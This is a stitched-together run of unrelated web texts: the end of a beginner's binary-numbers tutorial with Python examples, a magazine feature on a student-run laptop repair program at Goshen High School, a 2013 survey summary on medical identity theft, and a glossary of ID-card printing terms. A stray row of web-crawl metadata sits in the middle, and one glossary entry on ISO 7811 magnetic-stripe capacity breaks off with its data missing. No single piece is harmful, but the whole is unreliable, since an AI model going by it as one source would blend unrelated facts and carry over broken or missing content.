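print(hex(10))             # 0xa -- the A from the example above

# The Least Significant Bit check: a trailing 0 means even, 1 means odd.
print(to_decimal("1010") % 2)  # 0, so 1010 is even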
Ahh… It’s good to be done with that post. After reading through it, review the post to see if you understand the way binary numbers are counted or added together. There are plenty of great resources on the web or YouTube if you would like to continue learning.
That’s just the basics of binary and I hope I kept it accurate. Writing it up took a while but finally completed a thought I had at least two years ago. And as a reward for you, you should now understand the punchline of this joke:
“There are only 10 kinds of people in the world. Those who understand binary and those who don’t.”
Indiana high school kids learn IT skills by fixing and servicing computers
This feature first appeared in the Spring 2016 issue of Certification Magazine.
The Greek historian Plutarch wrote, “The mind is not a vessel that needs filling, but wood that needs igniting.” The inference is that a young mind, once ignited, gives off light and knowledge of its own. If this is true, then Brock Maust has a full-blown four-alarm blaze raging at Goshen High School (GHS) in Goshen, Ind.
The blaze is the school’s Computer Peer Repair Program. The program, supervised by Maust and run completely by students, is responsible for maintaining 2,500 laptop computers. As an added bonus, the program has now reached the stage of being self-funded and is preparing students to earn IT certifications.
In 2011, the Goshen Community Schools District recognized the importance and advantages of utilizing technology for learning and work, and set a goal of making their entire student body computer literate.
The District decided to phase in a one-to-one program of computers and students. They would begin by purchasing laptops for the incoming freshman class, then each new freshman class to follow would receive its own machines. By the fourth year, all students would have laptops on which to do their homework and class assignments.
Maust was busy teaching engineering and business classes — and also coaching both the boys and girls track teams — when his principal and the district superintendent approached him about organizing and managing the program.
The energetic teacher and coach, however, thrives on and enjoys challenges. His philosophy, he said, is “to not put a lid on my cup — I’m always looking for opportunities to grow and do new things.”
Maust believes he was chosen to run the program because of his engineering background, and also because “the program was not built yet. The plan was simple: ‘Have every student learn to use a laptop to enhance their educational experience.’ I have a degree in engineering technology, so I was able to grasp the Input-Process-Storage-Output and Feedback for the vision.”
Learning on the fly
After agreeing to run the program, Maust asked for clarification on what form it should take and exactly how it would work. The administration’s response was that they would support his efforts. Their only piece of advice was, “Just don’t let the building burn down.”
“The principal and superintendent had complete faith in us,” said Maust. “They knew we needed change, and that technology was growing at an exponential rate. There was no book we could turn to. We definitely learned to fly the plane as it was being built.”
District officials understood that Maust would have to build his program from the ground up and permitted him to hand-pick nine students to help him out. He selected students from his classes who he knew had a basic knowledge of computers and, more importantly, could work with and for him as needed.
Feeling that his students needed a more qualified teacher, and realizing that he didn’t have the knowledge base, Maust spent $1,000 of his own money to take a course that would help him better teach computer repair. “My wife wasn’t too pleased when she saw the bill,” he said laughingly.
The original vision for the program was for Maust to teach a computer repair class and supervise his nine students in simple troubleshooting for 500 laptops, as well as the boxing up of any machines that needed to be sent to the manufacturer for repair. As with a lot of fires, things quickly escalated. With the challenge of managing so many laptops it soon became obvious to Maust that his students could help conduct basic repairs.
He also realized that if the program were to become an authorized on-site repair location for the computer manufacturers, then it could be one-hundred percent self-funding. He met with administration, showed them the financial advantages, and laid out a curriculum to prepare students to earn the required IT certifications. District officials liked the idea and told him to keep going.
Full speed ahead
As with any new endeavor, this one brought many unforeseen challenges. “There were basic needs like shelving for 500 laptops, and scanners to help us check that many laptops in and out in a short period of time,” Maust said.
His team also had to develop a process of tracking when laptops needed to be repaired (yellow tape), when they were waiting for parts (red tape), and when they were good to go again (green tape). Each obstacle or problem was flagged — and then solved — as it arose. “Once we started to identify trends, then we began to create a vision and prepare for the problems before they happened,” Maust said.
The second year of the program meant an additional 500 laptops, and even more repairs. As more students enrolled in Maust’s classes, faculty began to see the positive impact of computers in the classroom. English, math and music teachers praised the ability of students to take notes, practice drills and use videos to learn new concepts.
By the end of the second year the district hired three of Maust’s students to help the program prepare for the coming school year. Under supervision, the students spent the summer repairing laptops and pulling computer cables throughout the building.
The program has been off and running ever since. For the current school year, the program is responsible for maintaining and servicing 2,500 laptops. The group also recently became certified to repair HP and Dell devices, and their work is now completely self-funded.
“As an on-site repair center, the program generates income that allows us to purchase more tools, equipment and storage capacity,” said Maust. “We are able to pay back the district for all of the equipment they supplied us with, and still make enough to help the district.”
Turning problems into assets
When dealing with so many laptops and teenagers, of course, there are the typical tech-related challenges — instances of unauthorized or inappropriate downloads, damaged or lost laptops, and so forth.
Maust has a very effective way of dealing with these issues. He focuses not on the technology, but on the student. “There will always be someone who wants to hack — a cow that gets out of the pasture,” he said. “We quickly identify the student and figure out why they did it, and then we focus on helping them learn and understand why they can’t do certain things.”
This focus on the student has been effective. “When a student does something wrong you have to implement discipline, but we do more than that,” said Maust. “If a student somehow gets ahold of administrative rights to the system, I’ll invite him to attend my class and teach him how to turn his skills around and make some money.”
Many of Goshen High’s students come from family backgrounds that lack portable computing devices at home, and they need to learn how to utilize them in an appropriate manner.
For some students, the program can be life changing. Jorge Reyes is a senior who credits the program for turning his educational experience around. During his freshmen year he was written up 19 times for disciplinary infractions.
During his sophomore year Reyes started taking the computer courses — and had just three disciplinary write-ups. “When he came on board with us, we saw a passion,” said Maust. “During his junior year, Reyes had zero disciplinary issues and became the program’s first ‘on-site’ computer repair manager. He has the responsibility to organize, order and manage all ‘on-site’ repairs.”
“I was on a bad path up until I found the computer repair program and was able to apply myself to something I grew to really enjoy,” said Reyes. “I am forever grateful to Mr. Maust. You can always turn things around and change your future!”
In addition to teaching students to work with computers, Maust’s program includes a hefty dose of the real-world skills they will need as they enter the workforce. Dealing with others when troubleshooting laptops, for example, the students have to develop interpersonal skills.
According to Maust, students “enhance their knowledge of current technology, ethical judgment and decision making, oral communication, data/statistics, organization, critical/analytical thinking and their ability to work with others through the onsite repair program.”
This year, Maust has more than 120 students enrolled in his computer courses, which they can take as a requirement or an elective, and many are earning IT certifications. His goal is for students to earn several certifications during their four years at school.
The program utilizes TestOut courseware to prepare students for TestOut’s PC Pro, Network Pro, and Security Pro certifications, as well as CompTIA’s A+, Network+, and Security+. These certifications are useful for students who want to work in computer repair, tech support, and IT infrastructure and security. Since the program is self-funding, it also pays for the cost of the certification exams.
The District has ambitious plans to expand the program. In the 2016- 2017 school year, it is proposed that the program will troubleshoot and maintain more than 6,000 devices district-wide. They will also open an on-site repair facility at the middle-school level. That particular project has been under the direction of Goshen’s technology associate Ron Lambdin — with the assistance of Jorge Reyes.
Maust is very appreciative of Reyes’ role in the middle-school expansion, “He has become the most vital part of our future vision by becoming our very first ‘off-site’ computer repair manager. An amazing adventure for this young man!” Reyes recently joined the district’s middle-school staff as an intern to help build the foundation for their on-site repair program.
The latest proposal is that, during the 2017-2018 school year, the district will create a community-wide co-op so that other districts can have students who are interested in IT certifications and tech support take courses at Goshen High.
The purpose will be to help those students earn IT certifications and return to their own schools where, with the assistance of Goshen’s ‘off-site’ managers, they can establish on-site repair facilities. “This is the reason I get up in the morning; this is my passion,” said Maust. “This will allow other school districts in our community to enhance, flourish and grow like we have. They can learn from our struggles and our journey.”
Medical identity theft is a national healthcare issue with life-threatening and hefty financial consequences. According to the 2013 Survey on Medical Identity Theft conducted by Ponemon Institute, medical identity theft and “family fraud” are on the rise; with the number of victims affected by medical identity theft up nearly 20 percent within the last year.
For the purposes of this study, medical identity theft occurs when someone uses an individual’s name and personal identity to fraudulently receive medical services, goods, and/or prescription drugs, including attempts to commit fraudulent billing.
Half of the consumers surveyed are not aware that medical identity theft can create life-threatening inaccuracies in their medical records, resulting in a misdiagnosis, mistreatment, or the wrong prescriptions. Yet, 50 percent of consumers surveyed do not take steps to protect themselves, mostly because they don’t know how.
The survey also finds that consumers often put themselves at risk by sharing their medical identification with family members or friends—unintentionally committing “family fraud”—to obtain medical services or treatment, healthcare products, or pharmaceuticals.
“Medical identity theft is tainting the healthcare ecosystem, much like poisoning the town’s water supply. Everyone will be affected,” said Dr. Larry Ponemon, chairman and founder of the Ponemon Institute. “The survey finds that consumers are completely unaware of the seriousness and dangers of medical identity theft.”
Key findings of the 2013 report:
Medical identity theft is growing in volume, impact, and cost.
Medical identity theft and fraud are major societal problems, placing enormous pressure on the country’s healthcare and financial ecosystems. In 2013, the economic consequences of medical identity theft to victims are estimated at more than $12.3 billion in out-of-pocket expenses. Fifty-six percent of victims lost trust and confidence in their healthcare provider. Fifty-seven percent of consumers would find another provider if they knew their healthcare provider could not safeguard their medical records.
Medical identity theft can cause serious medical and financial consequences, yet most consumers are unaware of the dangers.
Half of the consumers surveyed are not aware that medical identity theft can create permanent, life-threatening inaccuracies and permanent damage to their medical records. Medical identity theft victims surveyed experienced a misdiagnosis (15 percent of respondents), mistreatment (13 percent of respondents), delay in treatment (14 percent of respondents), or were prescribed the wrong pharmaceuticals (11 percent of respondents). Half of respondents have done nothing to resolve the incident.
Most consumers don’t take action to protect their health information.
Fifty percent of respondents do not take any steps to protect themselves from future medical identity theft. Fifty-four percent of consumers do not check their health records because they don’t know how and they trust their healthcare provider to be accurate. Likewise, 54 percent of respondents do not check their Explanation of Benefits (EOBs). Of those who found unfamiliar claims, 52 percent did not report them.
Consumers often share their medical identification with family members or friends, putting themselves at risk.
Thirty percent of respondents knowingly permitted a family member to use their personal identification to obtain medical services including treatment, healthcare products or pharmaceuticals. By sharing medical identification with family members or friends, consumers unintentionally leave themselves and their health records vulnerable. People do not know that they are committing fraud. More than 20 percent of people surveyed can’t remember how many times they shared their healthcare credentials. Forty-eight percent said they knew the thief and didn’t want to report him or her. | <urn:uuid:c8d3ec4f-00be-45ee-88dc-94bf09637b72> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2013/09/13/medical-identity-theft-affects-184-million-us-victims/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280086.25/warc/CC-MAIN-20170116095120-00429-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.951796 | 735 | 2.59375 | 3 |
Jump to: D-F | G-I | J-L | M-O | P-R | S-U | V-Z
Access Control – A system used to control access to buildings or rooms within buildings. Plastic cards (e.g., those with magnetic stripe or proximity control technologies) can be used to gain access to premises.
Barcode – A code consisting of a group of printed and variously patterned bars and spaces, and at times numerals, designed to be scanned and read into computer memory as identification for the object it labels.
Biometrics – Utilizes "something you are" to authenticate identification. This might include fingerprints, retina patterns, irises, hand geometry, vein patterns, voice passwords, or signature dynamics. Biometrics can be used with a smart card to authenticate the user. A user's biometric information is stored on a smart card, the card is placed in a reader, and a biometric scanner reads the information to match it against that on the card. This is a fast, accurate, and highly secure form of user authentication.
Bluetooth – A short range radio technology aimed at simplifying communications among Internet devices and between devices and the Internet. Another of its goals is to simplify data synchronization between Internet devices and other computers.
CR79 Card – Slightly smaller dimensionally than CR80, and made to fit in the well of a proximity card. Dimensions are 3.303" x 2.051" (83.9 mm x 51 mm).
CR80 Card (Standard credit card size) – Dimensions are 3.375" x 2.125" (85.6 mm x 54 mm).
CR90 Card (Driver's license size) – Dimensions are 3.63" x 2.37" (92 mm x 60 mm).
CR100 Card (Oversize/military cards) – Dimensions are 3.88" x 2.63" (98.5 mm x 67 mm).
CSV (Comma separated values) – A file format in which data values are separated by commas. An ID card software that offers import capability of CSV data allows you to access records from stored CSV text files.
CAC Card (Common access card) – Is a smart card distributed by the US Department of Defense (DoD) as a standard identification for active-duty military personnel, reserve personnel, non-DoD government employees and state employees of the National Guard and eligible contractor personnel. CAC cards are used as a common identification card as well as for authentication to grant access to DoD computers, networks and facilities. CAC establishes an authoritative process for the use of identity credentials.
CardJet Card – A Fargo Electronics, Teslin-based CR80 card with a surface that is specially formulated for thermal inkjet printing. CardJet inks bond to cards and dry instantly, without smearing. CardJet cards stand up well to abrasion, dye-migration and UV fading.
CardJet Printing – A discontinued printing technology by Fargo Persona that uses an HP inkjet-based print engine to transfer color and monochrome inks onto specially formulated CardJet cards. This particular inkjet printing process involves heating the inks within an ink cartridge. The heat generates vapor bubbles that are ejected in tiny droplets through nozzles in the ink cartridge. The droplets form text and images on the printable card surface which then bond and dry instantly. Example printers are the discontinued CardJet 410 and CardJet C7.
Card Dispenser – A container used to store blank cards in order to keep them free from dust and debris.
Chip – A piece of semi-conducting material (usually composed of silicon) on which an integrated circuit is embedded. Fitted inside an ID card that is used to store user information and access privileges, chips also provide added security to prevent card counterfeiting.
Card Hopper – A card hopper is a device that holds cards either prior to being printed (input hopper) or catches the card after it has been printed (output hopper). They also to keep cards clean and contaminate-free.
Cleaning Card – Assists in keeping a printer clean and maintaining the crucial components of the printer including the printhead, transport rollers and magnetic encoding station. Many card printer manufacturers recommend cleaning the printer with a cleaning card each time the ribbon is replaced.
Cleaning Roller – Includes an adhesive surface to gather dust and debris from blank cards. Many card printer manufacturers recommend replacing the cleaning roller after every 1000 prints or sooner.
Cleaning Tape – A roll of adhesive-lined material used to pick up dust and debris from blank cards prior to printing.
Combination Card (Combi Card) – Contains both contact and contactless chip technologies, using two different chips. Learn more about technology cards.
Composite Card (Comp or Polyester Composite Card) – A polyester core sandwiched between PVC material. Stronger and more durable than regular PVC cards, comp cards are recommended for utilization in high-usage environments or if lamination is part of one's particular ID card printing process. (Composition is 40% polyester/PET and 60% PVC material.)
Contact Smart Card – Contains a single embedded circuit chip that contains memory, or memory plus a microprocessor. Contact smart cards must be inserted into a card acceptor device where pins attached to the reader make "contact" with pads on the surface of the card to read and store information on the chip. Learn more about technology cards.
Contactless Smart Card (Proximity Card/Prox Card) – Contains a chip that is connected to an antenna (rather than contact pads as in contact smart cards). The communication between the chip and the reader is therefore wireless. Learn more about technology cards.
Cut and Paste – Refers to the very manual and outdated process of creating ID cards. This process involves taking a photo, manually cropping it and sticking it onto a card and then laminating it with a thermal laminator.
Florescent Panel – The F panel of a dye-sub printer ribbon allows you to print fluorescent grayscale text or images that are only visible with ultraviolet (UV) light. Using the F panel of a ribbon allows you to economically add a covert security feature to your printed ID cards.
GSA (General Services Administration) – A United States government organization that establishes pre-negotiated pricing for a variety of business-related equipment, products, and services for purchase by federal agencies. ID Wholesaler is GSA listed and stocks a comprehensive line of GSA-approved photo ID card printers, printer supplies, and ID badge accessories.
Guilloche Pattern (Fine Line Design) – A visual security element on a card that consists of a complex pattern of curving and overlapping fine lines. Guilloche patterns produce an illusion of motion when viewed at certain angles and therefore can be verified by the naked eye but not reproduced via a desktop printer.
Half Panel YMCKO Ribbon – Consists of half of the normal size yellow (Y), magenta (M) and cyan (C) color panels, but full panels of the black/monochrome (K) and clear overlay (O). This ribbon allows twice the normal ribbon yield than the standard YMKCO ribbon at a lower cost per card. YMCKO half panel ribbon is suited for cards where a color ID picture is needed, along with some background black resin text, logo or barcode printing. Examples of what this ribbon can be used for include student ID cards, employee ID cards and driver's licenses.
High Coercivity (HiCo) – Magnetic coding on a magnetic stripe. HiCo stripes are encoded at 2750 Oersted. HiCo magnetic stripes are generally black and store information on a more secure basis than low coercivity magnetic stripes due to the higher level of magnetic energy required to encode them. Information is harder to erase on HiCo cards; therefore, they are common in applications where cards are swiped often and require a long life (e.g., credit card applications).
High Volume Printing - Fast, efficient printing for producing large quantities of cards with minimal down time for supplies loading or maintenance.
High Definition Printing (HDP) – A process involving the printing of full color images onto clear HDP transfer film. The HDP film is then fused to the card through heat and pressure via a heated roller. This technology enhances card durability and consistently produces the best card color available - even on tough-to-print matte-finished cards, proximity cards and smart cards.
Hologram – A unique photographic printing that provides a three dimensional (3D) effect on a flat surface. Holograms cannot be easily copied and are used for visual security and aesthetic purposes on cards. Holographs are usually applied to ID cards as laminates, but they can also be built into blank card stock.
HoloKote – A Magicard patented card watermark technology; Magicard printers print a HoloKote watermark into the card overlay layer during printing. View a sample card with HoloKote and HoloPatch.
HoloMark – A tamper-evident, instantly verifiable 3-D image in a high resolution hologram embedded onto a card. Fargo standard and custom HoloMark cards provide an added level of protection against ID counterfeiting. HoloMark cards are for use with Fargo Direct-to-Card (DTC) series card printers/encoders. View a sample custom HoloMark card.
HoloMark Seal – A Fargo-brand peel-and-stick 3-D seal that if removed from a card, is not reusable. A checkerboard pattern will appear to indicate both the card and the seal have been tampered with. The HoloMark seal is a quick, economical way to add a level of security to an existing card.
HoloPatch – A unique Magicard visible gold patch built into blank card stock; HoloPatch works with HoloKote to highlight one of the HoloKote watermarks, providing daylight-visible ID card security. View a sample card with HoloKote and HoloPatch.
Hopper – Card input and output hoppers hold card stock as they are fed and ejected from the ID card printer.
HSPD 12 (Homeland Security Presidential Directive 12) – HSPD 12 established the requirements for a common identification standard for ID credentials issued by Federal departments and agencies to Federal employees and contractors for gaining physical access to Federally controlled facilities and logical access to Federally controlled information systems.
Inhibitor Panel Ribbons – Ribbons used for omitting printing over defined areas of a card, such as contact smart chips, a signature panel, or cards with embedded holograms.
Inkjet Printer – A printer or an all-in-one unit that shoots fast drying ink through tiny nozzles onto a page to form characters. The inkjet is currently the standard for personal computer printing. Inkjets are fast, affordable and relatively quiet, they provide high quality graphics and print in color.
Input Card Hopper – An ID card printer apparatus that holds cards before they are printed. Input hoppers expedite the printing process and help prevent card contamination, ensuring the very best possible print quality.
Interface - A connection standard for transferring data that's recognized by all PCs or Macintosh computers. For example, a parallel printer port is a common interface found on virtually all PCs for transferring data from the computer to a printer.
International Organization for Standardization (ISO) – In the ID card printing market for instance, ISO defines specifications for magnetic stripe encoding. Printer encoders generally support dual high/low coercivity and tracks 1, 2 and 3. Please check printer specifications.
Key FOB – A security token that can be attached to a keychain.
JIS II – Japanese Industrial Standard for magnetic stripe encoding. JIS II is published and translated into English by the Japan Standards Association.
Lamination (Overlamination) – The process of combining lamination material and core material using time, heat and pressure. Available in clear or holographic designs and in varying thicknesses, laminate patches are typically used for high usage cards (e.g., cards that must be swiped through a reader) or to add advanced visual card security.
Lanyard – A ribbon with a clip worn around the neck, usually used to display one's ID card.
Liquid Crystal Display (LCD) – Shows the current status of the printer, and changes according to the printer's current mode of operation. LCD communicates an error with text, which is easier to interpret than LED lights.
Light-Emitting Diode (LED) – Shows the current status of a printer, and changes according to the printer's current mode of operation. LED communicates with a blinking light.
Lockable Hopper – Some ID card printers provide a lockable card hopper door. This lock is intended to help prevent theft of your blank card stock. This feature is especially helpful if using valuable card stock such as preprinted cards, smart cards or cards with built-in security features such as holograms.
Low Coercivity (LoCo) – Magnetic coding on a magnetic stripe. LoCo stripes are encoded at 300 Oersted. LoCo stripes are generally brown and store information less securely than high coercivity magnetic stripes.
Machine Readable – A code or characters that can be read by machines.
Magnetic Stripe (Magstripe) – Refers to the black or brown stripe on the back side of a card. The stripe is made of magnetic particles of resin. There are two types of magnetic striping: high coercivity (HiCo) and low coercivity (LoCo). The resin particle material determines the coercivity of the stripe; the higher the coercivity, the harder it is to encode or erase information from the stripe. Magnetic stripes are often used in applications for access control, time and attendance, lunch programs, library cards and more. HiCo magnetic stripe cards are used in applications of frequent usage and need a long life (e.g., credit card applications); LoCo magnetic stripe cards are often used in hotel room access control applications.
Per the ISO 7811 format, the amount of data you can encode to a magnetic stripe is as follows:
Microprocessor Card (Asynchronous Card) – A type of smart card that features 1 kilobyte to 64 Kbytes of memory and is suitable for portable or confidential files, identification, tokens, electronic purses or any combination of uses.
Microtext – A visual security element on a card that is usually placed within a line or artwork element. Microtext is only a few thousandths of an inch tall, is visible only under magnification, and cannot be duplicated by dye sublimation, inkjet or laser printers.
Minimum Advertised Pricing (MAP) – The manufacturer's suggested retail price (MSRP) or an alternative factory-established price that some products are required to be advertised at.
Monochrome – A single color (does not pertain only to black).
Network ID Software – Software that allows the saving, storage and sharing of cardholder records and data across multiple facilities, departments and applications.
Network Printer – A printer available for use by workstations on a network.
ODBC (Open database connections) – ID card software with ODBC connectivity allows you to share card data between internal and outside databases.
Oersted – Pertains to magnetic encoding. The unit of magnetic coercive force used to define difficulty of erasure of magnetic material.
Output Card Hopper – Attaches to an ID card printer and ”catches” cards after they’ve been printed. Some printers offer the option of re-arranging the location of the output hopper to have the cards exit the printer on the same side that they enter (especially beneficial for offices having tight workspaces).
Output Stacker – Stores printed cards in a first-in/first-out order. This feature makes it easy to keep printed cards in a specific order for faster issuance or to print serialized cards.
Overcoat (Overlay, Topcoat) – The last layer ('O' in YMCKO) that is placed onto an ID card after the color or monochrome panels have been applied that protects an ID card from fading and scratching.
Oversized Cards – Used for more efficient visual identification and are available in many non-standard sizes. The most popular sizes are CR90 (3.63" x 2.37"/92 mm x 60 mm) and CR100 (3.88" x 2.63"/98.5 mm x 67 mm).
Overlamination (Lamination) - The process of combining lamination material and core material using time, heat and pressure. Available in clear or holographic designs and in varying thicknesses, laminate patches used in card printers come on rolls, with and without carriers/liners and are typically used for high usage cards (e.g., cards that must be swiped through a reader) or to add advanced visual card security.
Overlay (Overcoat, Topcoat) – The clear overlay panel (O) is provided on dye sublimation print ribbons. This panel is automatically applied to printed cards and helps prevent images from premature wear or UV fading. All dye sublimation printed images must have either this overlay panel or an overlaminate applied to protect them.
Over-the-Edge (Edge-to-Edge/Edgeless) – Refers to the maximum printable area on a card. Printers with this capability can print past the edge of a card resulting in printed cards with absolutely no border.
Parallel Interface – A channel or transmission path capable of transferring more than one bit simultaneously.
Polyester Composite Card (Poly-Comp or Comp Card) – A polyester core sandwiched between PVC material. Stronger and more durable than regular PVC cards, comp cards are recommended for utilization in high-usage environments or if lamination is part of one's particular ID card printing process. (Composition is 40% polyester and 60% PVC material.)
PET Card (Plain Polyethylene Terephthalate or Polyester Card) – Composite cards produced for use in the identification industry are made from PET-G, also known as glycolised polyester. The 'G' represents glycol modifiers, which are incorporated to minimize brittleness and premature aging that occur if unmodified amorphous polyethylene terephthalate (APET) is used in the production of cards.
PIV Card (Personal Identity Verification Cards) – A smart card issued to an individual for the purpose of identification verification. PIV cards contain stored identity credentials (e.g., photo, electronic fingerprint representation) so that the identity of the cardholder can be verified against stored credentials by another person or computer. PIC cards must be personalized with identity information for the individual to whom the card is issued, in order to perform identity verification by both humans and automated systems. Humans can use the physical card to conduct automated identity verification.
Printhead – Card printer component that applies the text, graphics and images to the card material.
Printer Driver – The software that enables your operating system to properly build and format commands and data bound for your printer; in effect, a printer driver tells your operating system all that it needs to know to successfully operate your printer.
Proximity Card (Prox Card/Contactless Smart Card) – Used for access control applications. Embedded in the card is a metallic antenna coil, which allows it to communicate with an external antenna. Because the cards require only close "proximity" to a RF antenna to be read, they are also referred to as contactless cards.
Proximity Card Encoder – The prox card encoder uses a HID ProxPoint Plus reader mounted on the e-card docking station inside the printer/encoder. The ProxPoint is a "read only" device producing a Wiegand signal that is converted to RS-232 using a Cypress Computer Systems CVT-2232. Application programs can read information from HID prox cards via a RS-232 signal through a dedicated DB-9 port on the outside of the printer labeled "Prox."
Polyvinyl Chloride (PVC Cards) – The primary material used for typical plastic cards.
Radio Frequency ID (RFID) – A wireless technology for communication between electronic devices. In the ID card industry, it is RFID technology that enables a contactless smart card to communicate with a reader.
Reject Hopper – A dedicated receptacle that collects the printed cards which fail to encode properly during the card printing process. A reject hopper may be integrated into the printer or may be attached to the printer.
Restrictions of the Use of Hazardous Substances (RoHS) – An advanced Japanese and European directive that regulates maximum concentrations of six hazardous materials that are used in electrical and electronics equipment. These materials are lead, mercury, cadmium, hexavalent chromium, polybrominated biphenyls (PBB) and polybrominated diphenyl ethers (PBDE).
Resin Thermal Transfer – The process used to print sharp black text and crisp barcodes that can be read by both infra-red and visible-light barcode scanners. It is also the process used to print ultra-fast, economical one color cards. Like dye sublimation, this process uses a thermal printhead to transfer color from the ribbon roll to the card. The difference is that solid dots of color are transferred in the form of a resin-based ink which fuses to the surface of the card when heated. This produces highly durable, single color images.
Resolution – Dimension of the smallest element of an image that can be printed. Usually stated as dots per inch (DPI).
Retransfer (reverse image transfer) – ID card printing technique where the card image is first printed onto transparent retransfer film that is then stuck onto the card surface. Retransfer printing provides high quality images and provides the ability to print on uneven card surfaces and/or differing materials.
Retransfer Film (reverse transfer film) – Used with a reverse transfer ID card printer which first transfers information to be printed onto the card to the underside of a clear ribbon (the initial dye transfer), then transfers the printed information from that ribbon onto the card so that the information on the card appears under a protective "release layer" of the clear ribbon (the retransfer step). In essence, card images are transferred (or sublimated) from the YMCK dye film onto a clear film and then laminated entirely onto the card.
Rewritable Card – Contains a thermo-sensitive material that allows data to become visible/invisible depending upon the temperature applied. Cards can be erased and rewritten many times over. Rewritable card applications include uses in visitor management, customer loyalty and schools.
Scratch Off Ribbon – Used for applications such as pre-paid phone cards. Scratch off ribbon to 'hides' the PIN number that will activate the phone card until it is in the hands of the card owner. Before applying scratch off ribbon, a monochrome or full color ribbon (scratch off ribbon can be applied on top of the overlay or 'O' panel of a YMCKO ribbon) must be used to print the data and graphics desired on the card. Then the monochrome or color ribbon must be replaced with the scratch off ribbon (the card layout must subsequently also be changed so that the scratch off material prints in the area desired) and the card resent through the printer.
Self-Adhesive Laminate – A laminate that can be applied manually - without the use of a thermal lamination unit. Laminates in general can add an extra level of security and durability to a card.
Signature Capture Pad – A form of biometrics that contains a touchpad sensor that reads the pressure applied to a stylus tip used for signing, and then transmits the data to a computer.
Signature Panel – An area on a card the allows the cardholder to write their personal signature.
Single-Sided – Capable of printing on only one side of a card.
Smart Card – Cards that have an embedded computer circuit that contains either a memory chip or a microprocessor chip. There are several types of smart cards, including: memory, contact, contactless, hybrid (twin), combi, dual interface and proximity. Learn more about technology cards.
Thermal Printhead – An electronic device which uses heat to transfer a digitized image from a special ribbon to the flat surface of a plastic card.
Thermal Printing – The process of creating an image on a plastic card using a heated printhead.
Thermal Transfer Overlaminate – A card overlaminate available in a 0.25 mil thickness that increases card security and durability; often used for moderate durability applications or when additional security (such as holographic images) is needed.
Topcoat (Overcoat, Overlay) – The topcoat (T) panel of a ribbon is applied to printed cards and helps prevent images from some premature wear or UV fading. Topcoats are available as a panel on color and monochrome ribbons, or provided on a separate roll in clear or holographic styles.
Twain – An interface used for communications between image processing software and digital cameras or scanners that allows for the importing of an image into the image processing software.
TWIC Card (Transportation Worker Identification Credential) – TWIC is a common identification credential for all personnel requiring unescorted access to secure areas of facilities and vessels by the Maritime Transportation Security Act (MTSA), and all mariners holding the Coast Guard-issued credentials. TWIC cards are a tamper-resistant credential containing the cardholder's biometric (fingerprint template) to allow for a positive link between the card and the individual.
Ultraviolet (UV) Ink – A visual security element on a card that allows invisible graphics to turn red when viewed under UV light.
Universal Serial Bus (USB) – An input/output (I/O) bus capable of data transfer at 12 megabits (1.5 megabytes) used for connecting peripherals to a microprocessor. Typically, each device connected to a computer uses its own port. USB can connect up to 127 peripherals through a single port by daisy-chaining the peripherals together. USB devices may be hot plugged, which means that power does not have to be turned off to connect or disconnect a peripheral. Most major hardware, software, and telecommunications providers support USB. Some printers do not yet support USB; however, most will accommodate a parallel to USB conversion cable.
Visitor Management Software – Software used to register, badge and track visitors.
VeriMark – A tamper-evident, instantly verifiable 2-D silver metallic foil embedded with a logo or other custom graphics onto a card using a hot stamp process. Fargo custom VeriMark cards provide an added level of protection against ID counterfeiting. VeriMark cards are for use with Fargo Direct-to-Card (DTC) series card printers/encoders. View a sample custom VeriMark card.
Wax Ribbon – Can be applied to an array of card materials and is therefore more versatile than a standard ribbon. Wax ribbon can be used with ABS and special varnished cards, as well as non-PVC card materials such as cardboards (e.g., paper cards).
Webcam – A digital camera capable of downloading images to a computer for transmission over the Internet or other network.
YMC (Yellow/Magenta/Cyan) – Yellow, magenta and cyan are the primary print colors for cards. The three colors are combined in varying degrees to make a full spectrum of colors.
YMCIKH (Yellow/Magenta/Cyan/Inhibitor/Monochrome/Heat Seal) – Yellow, magenta and cyan are the primary print colors for cards. The three colors are combined in varying degrees to make a full spectrum of colors. This ribbon prints to cards requiring specific areas to be unprinted and with difficult-to-print-to card surfaces. The 'I' panel is an inhibitor panel that prevents defined areas of the card to not be printed over. Monochrome or ‘K’ is the black resin panel is used for monochrome printing on the front or back side of the card. The 'H' panel helps HDP film bond to surfaces that are not made of PVC, like polycarbonate or ABS plastic, and in some cases, matte-finish cards.
YMCK (Yellow/Magenta/Cyan/Monochrome) – Yellow, magenta and cyan are the primary print colors for cards. The three colors are combined in varying degrees to make a full spectrum of colors. Monochrome or 'K' is a black resin panel.
YMCKI (Yellow/Magenta/Cyan/Monochrome/Inhibitor) – Yellow, magenta and cyan are the primary print colors for cards. The three colors are combined in varying degrees to make a full spectrum of colors. Monochrome or 'K' is a black resin panel. The inhibitor or 'I' panel is used to prevent the retransfer film from being applied to specified areas, such as signature panels or surface foils. The main use of the I panel is when printing on cards with a signature panel, since the retransfer film would make this area hard to write on.
YMCKIKI (Yellow/Magenta/Cyan/Monochrome/Inhibitor/Monochrome/Inhibitor) – Yellow, magenta and cyan are the primary print colors for cards. The three colors are combines in varying degrees to make a full spectrum of colors. Monochrome or ‘K’ is the black resin panel is used for monochrome printing on the front or back side of the card. The inhibitor or ‘I’ panel allows cards with surface foils or signature panels to be printed on by preventing the retransfer film from being applied to those specified areas during printing. The latter ‘K’ and 'I' panels are used for printing dual-sided cards that require not printing on portions of both the front and back side of cards like contact smart chips or holograms embedded into cards.
YMCKK (Yellow/Magenta/Cyan/Monochrome/Monochrome) – Yellow, magenta and cyan are the primary print colors for cards. The three colors are combined in varying degrees to make a full spectrum of colors. Monochrome or 'K' are black resin panels - the latter 'K' is used for monochrome printing on the back side of a card.
YMCKT (Yellow/Magenta/Cyan/Monochrome/Topcoat) – Yellow, magenta and cyan are the primary print colors for cards. The three colors are combined in varying degrees to make a full spectrum of colors. Monochrome or 'K' is a black resin panel, and the topcoat panel provides the card with minimal protection against everyday use and environmental elements (e.g., UV rays).
YMCKO (Yellow/Magenta/Cyan/Monochrome/Overcoat) – Yellow, magenta and cyan are the primary print colors for cards. The three colors are combined in varying degrees to make a full spectrum of colors. Monochrome or 'K' is a black resin panel, and clear overlay or 'O' is a thin, protective layer.
